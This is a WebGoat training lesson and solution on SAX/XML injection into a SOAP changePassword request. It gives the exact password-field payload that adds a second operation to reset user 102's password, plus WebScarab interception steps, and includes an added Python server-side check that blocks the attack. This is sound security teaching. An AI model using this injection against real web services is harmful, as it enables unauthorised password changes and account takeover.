Lesson Plan Title: How to Perform Web Service SAX Injection

Concept / Topic To Teach:

Web Services communicate through SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in its Web Services Description Language (WSDL) file.

General Goal(s):

Some web interfaces make use of Web Services in the background. If the frontend relies on the web service for all input validation, it may be possible to corrupt the XML that the web interface sends.

In this exercise, try to change the password for a user other than 101.

Solution:

To complete this lesson you need to reset the password of a user whose user ID is different from 101 (your own user ID).

When you fill in a password and click "Go!", the following XML request is created, submitted and parsed by the SAX parser:

<?xml version='1.0' encoding='UTF-8'?>
<wsns0:Envelope
  xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
  xmlns:xsd='http://www.w3.org/2001/XMLSchema'
  xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'
  xmlns:wsns1='http://lessons.webgoat.owasp.org'>
  <wsns0:Body>
    <wsns1:changePassword>
      <id xsi:type='xsd:int'>101</id>
      <password xsi:type='xsd:string'>[password]</password>
    </wsns1:changePassword>
  </wsns0:Body>
</wsns0:Envelope>

SAX parsers will parse anything that is well-formed, meaning that every start tag has a matching end tag and the document is syntactically correct; nothing stops a second operation from appearing in the same Body. When you are able to add a new changePassword element with its own id and password tags, the SAX parser will be more than happy to change the password for the user ID provided.

So you need to have something like this as a final result:

<?xml version='1.0' encoding='UTF-8'?>
<wsns0:Envelope
  xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
  xmlns:xsd='http://www.w3.org/2001/XMLSchema'
  xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'
  xmlns:wsns1='http://lessons.webgoat.owasp.org'>
  <wsns0:Body>
    <wsns1:changePassword>
      <id xsi:type='xsd:int'>101</id>
      <password xsi:type='xsd:string'>[password]</password>
    </wsns1:changePassword>
    <wsns1:changePassword>
      <id xsi:type='xsd:int'>102</id>
      <password xsi:type='xsd:string'>notforyoutoknow</password>
    </wsns1:changePassword>
  </wsns0:Body>
</wsns0:Envelope>

This requires injecting the following as the value of the password field:

newpassword</password>
    </wsns1:changePassword>
    <wsns1:changePassword>
      <id xsi:type='xsd:int'>102</id>
      <password xsi:type='xsd:string'>notforyoutoknow

The HTML input field has a length limitation, so you need to intercept the HTTP request with WebScarab and replace the password parameter with the payload.
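The server-side check that would defeat this injection, as an added example that is not part of the lesson or of WebGoat's own code: a namespace-aware Python SAX handler collects the id of every changePassword operation in the Body and the request is rejected unless there is exactly one operation and its id equals the authenticated session user's id. The two sample requests are constructed from the lesson's XML; IdCollector and authorize_change_password are hypothetical names.

```python
import io
import xml.sax
from xml.sax.handler import feature_namespaces, feature_external_ges
LESSON_NS = "http://lessons.webgoat.owasp.org"

# Constructed samples: the lesson's request for user 101, and one with a second changePassword for 102 injected.
ENVELOPE = (b"<?xml version='1.0' encoding='UTF-8'?>"
            b"<wsns0:Envelope xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'"
            b" xmlns:xsd='http://www.w3.org/2001/XMLSchema'"
            b" xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'"
            b" xmlns:wsns1='http://lessons.webgoat.owasp.org'>"
            b"<wsns0:Body>%s</wsns0:Body></wsns0:Envelope>")
OP = (b"<wsns1:changePassword><id xsi:type='xsd:int'>%d</id>"
      b"<password xsi:type='xsd:string'>%s</password></wsns1:changePassword>")
LEGIT = ENVELOPE % (OP % (101, b"test"))
INJECTED = ENVELOPE % (OP % (101, b"test") + OP % (102, b"notforyoutoknow"))

class IdCollector(xml.sax.ContentHandler):
    def __init__(self):
        super().__init__()
        self.ids, self._in_op, self._in_id, self._buf = [], False, False, []
    def startElementNS(self, name, qname, attrs):
        if name == (LESSON_NS, "changePassword"):
            self._in_op = True
        elif self._in_op and name == (None, "id"):
            self._in_id, self._buf = True, []
    def characters(self, content):
        if self._in_id:
            self._buf.append(content)
    def endElementNS(self, name, qname):
        if self._in_id and name == (None, "id"):
            self.ids.append("".join(self._buf).strip())
            self._in_id = False
        elif name == (LESSON_NS, "changePassword"):
            self._in_op = False

def authorize_change_password(soap_bytes, session_user_id):
    """The server-side check the lesson's service lacks: exactly one operation,
    whose id must equal the session user's id, never a client-chosen value."""
    handler, parser = IdCollector(), xml.sax.make_parser()
    parser.setFeature(feature_namespaces, True)
    parser.setFeature(feature_external_ges, False)  # no external entities
    parser.setContentHandler(handler)
    try:
        parser.parse(io.BytesIO(soap_bytes))
    except xml.sax.SAXParseException as exc:
        return False, "malformed XML: " + exc.getMessage()
    if handler.ids != [str(session_user_id)]:
        return False, f"ids {handler.ids} do not match session user {session_user_id}"
    return True, "accepted"
```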

Enter a password 'test' and click "Go!".

Figure 113 Reset password with test

Intercept the request in WebScarab and replace the string test with the payload.

Figure 114 Intercept request

Figure 115 Inject XML payload

Figure 116 Lesson completed

Solution by Erwin Geirnaert ZION SECURITY